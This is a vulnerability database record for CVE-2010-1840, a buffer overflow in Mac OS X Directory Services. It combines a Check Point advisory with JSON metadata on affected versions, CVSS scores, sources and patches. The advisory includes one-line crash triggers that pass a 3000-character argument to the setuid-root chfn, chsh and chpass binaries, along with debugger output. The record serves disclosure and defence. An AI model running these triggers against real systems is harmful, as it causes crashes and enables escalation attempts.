var-201011-0215
Vulnerability from variot
Stack-based buffer overflow in the password-validation functionality in Directory Services in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via unspecified vectors. Local attackers could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. This issue affects Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X 10.6 to 10.6.4, and Mac OS X Server 10.6 to 10.6.4. NOTE: This issue was previously covered in BID 44778 (Apple Mac OS X Prior to 10.6.5 Multiple Security Vulnerabilities), but has been given its own record to better document it. Check Point Software Technologies - Vulnerability Discovery Team (VDT) http://www.checkpoint.com/defense/
Apple Directory Services Memory Corruption CVE-2010-1840
INTRODUCTION
chfn, chpass and chsh dos not properly parse authname switch ("-u"), which causes the applications to crash when parsing a long string. Those binaries are setuid root by default.
This problem was confirmed in the following versions of Apple binaries and MacOS, other versions may be also affected:
Apple Mac OS X 10.5.8 32bits /usr/bin/chfn, /usr/bin/chpass, /usr/bin/chsh Apple Mac OS X 10.6.2 64bits /usr/bin/chfn, /usr/bin/chpass, /usr/bin/chsh
CVSS Scoring System
The CVSS score is: 3.3 Base Score: 4.2 Temporal Score: 3.3 We used the following values to calculate the scores: Base score is: AV:L/AC:L/Au:R/C:C/I:C/A:C Temporal score is: E:POC/RL:OF/RC:C
TRIGGERING THE PROBLEM
/usr/bin/chfn -u perl -e 'print "A" x 3000'
/usr/bin/chsh -u perl -e 'print "A" x 3000'
/usr/bin/chpass -u perl -e 'print "A" x 3000'
DETAILS
Disassembly:
0x92237215 : mov $0x28,%al 0x92237217 : cmp $0xc,%ecx 0x9223721a : mov $0x14,%dl 0x9223721c : cmovne %edx,%eax 0x9223721f : add %esi,%eax 0x92237221 : mov 0xc(%ebp),%edx 0x92237224 : lea (%eax,%edx,4),%eax 0x92237227 : mov (%eax),%eax <----- Crash here.
(gdb) x/i $pc 0x92237227 : mov (%eax),%eax (gdb) i r $eax eax 0x585d910 92657936 (gdb) bt
0 0x92237227 in CFArrayGetValueAtIndex ()
1 0x9225c46b in _CFBundleTryOnePreferredLprojNameInDirectory ()
2 0x9225d80c in _CFBundleAddPreferredLprojNamesInDirectory ()
3 0x9224b7b0 in _CFBundleGetLanguageSearchList ()
4 0x9225d8da in _CFBundleAddPreferredLprojNamesInDirectory ()
5 0x9224b7b0 in _CFBundleGetLanguageSearchList ()
6 0x9225b50c in CFBundleCopyResourceURL ()
7 0x9225bb32 in CFBundleCopyLocalizedString ()
8 0x903633eb in _ODNodeSetCredentials ()
9 0x90369813 in ODRecordSetNodeCredentials ()
10 0x000044be in ?? ()
11 0x000026ac in ?? ()
12 0x000022ee in ?? ()
The MacOS Heap Protection mechanisms mitigates the impact of this vulnerability.
CREDITS
This vulnerability was researched by Rodrigo Rubira Branco from Check Point Vulnerability Discovery Team (VDT).
ACKNOWLEDGES
Many thanks to Rafael Silva who brought the issue in chfn binary to our attention.
-- Rodrigo Rubira Branco Senior Security Researcher Vulnerability Discovery Team (VDT) Check Point Software Technologies http://www.checkpoint.com/defense
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201011-0215",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "mac os x",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.6.2"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.6.4"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.6.2"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.6.1"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.5.8"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.6.3"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.6.4"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.6.1"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.5.8"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.6.0"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "10.6.0"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "10.6.3"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.5.8"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.6 to v10.6.4"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.5.8"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.6 to v10.6.4"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.4"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.3"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.2"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.8"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.4"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.3"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.2"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.8"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6"
},
{
"model": "mac os server",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.5"
}
],
"sources": [
{
"db": "BID",
"id": "44816"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-002418"
},
{
"db": "CNNVD",
"id": "CNNVD-201011-148"
},
{
"db": "NVD",
"id": "CVE-2010-1840"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:apple:mac_os_x",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:apple:mac_os_x_server",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-002418"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Rodrigo Rubira Branco of Check Point Vulnerability Discovery Team (VDT), and\nRainer Mueller.",
"sources": [
{
"db": "BID",
"id": "44816"
}
],
"trust": 0.3
},
"cve": "CVE-2010-1840",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2010-1840",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-44445",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2010-1840",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2010-1840",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201011-148",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-44445",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-44445"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-002418"
},
{
"db": "CNNVD",
"id": "CNNVD-201011-148"
},
{
"db": "NVD",
"id": "CVE-2010-1840"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Stack-based buffer overflow in the password-validation functionality in Directory Services in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via unspecified vectors. \nLocal attackers could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. \nThis issue affects Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X 10.6 to 10.6.4, and Mac OS X Server 10.6 to 10.6.4. \nNOTE: This issue was previously covered in BID 44778 (Apple Mac OS X Prior to 10.6.5 Multiple Security Vulnerabilities), but has been given its own record to better document it. Check Point Software Technologies - Vulnerability Discovery Team (VDT)\nhttp://www.checkpoint.com/defense/\n\nApple Directory Services Memory Corruption\nCVE-2010-1840\n\n\nINTRODUCTION\n\nchfn, chpass and chsh dos not properly parse authname switch (\"-u\"), which causes the applications to crash when parsing a long string. Those binaries are setuid root by default. \n\nThis problem was confirmed in the following versions of Apple binaries and MacOS, other versions may be also affected: \n\nApple Mac OS X 10.5.8 32bits /usr/bin/chfn, /usr/bin/chpass, /usr/bin/chsh\nApple Mac OS X 10.6.2 64bits /usr/bin/chfn, /usr/bin/chpass, /usr/bin/chsh\n\n\nCVSS Scoring System\n\nThe CVSS score is: 3.3\n\tBase Score: 4.2\n\tTemporal Score: 3.3\nWe used the following values to calculate the scores:\n\tBase score is: AV:L/AC:L/Au:R/C:C/I:C/A:C\n\tTemporal score is: E:POC/RL:OF/RC:C\n\n\nTRIGGERING THE PROBLEM\n\n/usr/bin/chfn -u `perl -e \u0027print \"A\" x 3000\u0027`\n/usr/bin/chsh -u `perl -e \u0027print \"A\" x 3000\u0027`\n/usr/bin/chpass -u `perl -e \u0027print \"A\" x 3000\u0027`\n\n\nDETAILS\n\nDisassembly:\n\n0x92237215 \u003cCFArrayGetValueAtIndex+101\u003e:\tmov $0x28,%al\n0x92237217 \u003cCFArrayGetValueAtIndex+103\u003e:\tcmp $0xc,%ecx\n0x9223721a \u003cCFArrayGetValueAtIndex+106\u003e:\tmov $0x14,%dl\n0x9223721c \u003cCFArrayGetValueAtIndex+108\u003e:\tcmovne %edx,%eax\n0x9223721f \u003cCFArrayGetValueAtIndex+111\u003e:\tadd %esi,%eax\n0x92237221 \u003cCFArrayGetValueAtIndex+113\u003e:\tmov 0xc(%ebp),%edx\n0x92237224 \u003cCFArrayGetValueAtIndex+116\u003e:\tlea (%eax,%edx,4),%eax\n0x92237227 \u003cCFArrayGetValueAtIndex+119\u003e:\tmov (%eax),%eax \u003c----- Crash here. \n\n(gdb) x/i $pc\n0x92237227 \u003cCFArrayGetValueAtIndex+119\u003e:\tmov (%eax),%eax\n(gdb) i r $eax\neax 0x585d910\t92657936\n(gdb) bt\n#0 0x92237227 in CFArrayGetValueAtIndex ()\n#1 0x9225c46b in _CFBundleTryOnePreferredLprojNameInDirectory ()\n#2 0x9225d80c in _CFBundleAddPreferredLprojNamesInDirectory ()\n#3 0x9224b7b0 in _CFBundleGetLanguageSearchList ()\n#4 0x9225d8da in _CFBundleAddPreferredLprojNamesInDirectory ()\n#5 0x9224b7b0 in _CFBundleGetLanguageSearchList ()\n#6 0x9225b50c in CFBundleCopyResourceURL ()\n#7 0x9225bb32 in CFBundleCopyLocalizedString ()\n#8 0x903633eb in _ODNodeSetCredentials ()\n#9 0x90369813 in ODRecordSetNodeCredentials ()\n#10 0x000044be in ?? ()\n#11 0x000026ac in ?? ()\n#12 0x000022ee in ?? ()\n\n\nThe MacOS Heap Protection mechanisms mitigates the impact of this vulnerability. \n\n\nCREDITS\n\nThis vulnerability was researched by Rodrigo Rubira Branco from Check Point Vulnerability Discovery Team (VDT). \n\nACKNOWLEDGES\n\nMany thanks to Rafael Silva who brought the issue in chfn binary to our attention. \n\n\n\n\n--\nRodrigo Rubira Branco\nSenior Security Researcher\nVulnerability Discovery Team (VDT)\nCheck Point Software Technologies\nhttp://www.checkpoint.com/defense\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2010-1840"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-002418"
},
{
"db": "BID",
"id": "44816"
},
{
"db": "VULHUB",
"id": "VHN-44445"
},
{
"db": "PACKETSTORM",
"id": "95771"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-44445",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-44445"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2010-1840",
"trust": 2.9
},
{
"db": "SECTRACK",
"id": "1024723",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2010-002418",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201011-148",
"trust": 0.7
},
{
"db": "APPLE",
"id": "APPLE-SA-2010-11-10-1",
"trust": 0.6
},
{
"db": "BID",
"id": "44816",
"trust": 0.4
},
{
"db": "PACKETSTORM",
"id": "95771",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-70191",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "15491",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-44445",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-44445"
},
{
"db": "BID",
"id": "44816"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-002418"
},
{
"db": "PACKETSTORM",
"id": "95771"
},
{
"db": "CNNVD",
"id": "CNNVD-201011-148"
},
{
"db": "NVD",
"id": "CVE-2010-1840"
}
]
},
"id": "VAR-201011-0215",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-44445"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T19:26:25.611000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "HT4435",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT4435"
},
{
"title": "HT4435",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT4435?viewlocale=ja_JP"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-002418"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-44445"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-002418"
},
{
"db": "NVD",
"id": "CVE-2010-1840"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://lists.apple.com/archives/security-announce/2010//nov/msg00000.html"
},
{
"trust": 1.7,
"url": "http://support.apple.com/kb/ht4435"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id?1024723"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1840"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnvu331391"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-1840"
},
{
"trust": 0.3,
"url": "http://www.apple.com/macosx/"
},
{
"trust": 0.3,
"url": "/archive/1/514724"
},
{
"trust": 0.3,
"url": "http://www.securityfocus.com/advisories/20899"
},
{
"trust": 0.1,
"url": "http://www.checkpoint.com/defense/"
},
{
"trust": 0.1,
"url": "http://www.checkpoint.com/defense"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1840"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-44445"
},
{
"db": "BID",
"id": "44816"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-002418"
},
{
"db": "PACKETSTORM",
"id": "95771"
},
{
"db": "CNNVD",
"id": "CNNVD-201011-148"
},
{
"db": "NVD",
"id": "CVE-2010-1840"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-44445"
},
{
"db": "BID",
"id": "44816"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-002418"
},
{
"db": "PACKETSTORM",
"id": "95771"
},
{
"db": "CNNVD",
"id": "CNNVD-201011-148"
},
{
"db": "NVD",
"id": "CVE-2010-1840"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-11-15T00:00:00",
"db": "VULHUB",
"id": "VHN-44445"
},
{
"date": "2010-11-10T00:00:00",
"db": "BID",
"id": "44816"
},
{
"date": "2010-11-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2010-002418"
},
{
"date": "2010-11-11T18:02:00",
"db": "PACKETSTORM",
"id": "95771"
},
{
"date": "2010-11-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201011-148"
},
{
"date": "2010-11-15T23:00:04.533000",
"db": "NVD",
"id": "CVE-2010-1840"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-12-10T00:00:00",
"db": "VULHUB",
"id": "VHN-44445"
},
{
"date": "2010-11-12T16:57:00",
"db": "BID",
"id": "44816"
},
{
"date": "2010-11-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2010-002418"
},
{
"date": "2011-01-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201011-148"
},
{
"date": "2024-11-21T01:15:17.793000",
"db": "NVD",
"id": "CVE-2010-1840"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201011-148"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Apple Mac OS X of password-validation Stack-based buffer overflow vulnerability in functionality",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-002418"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201011-148"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…
Loading…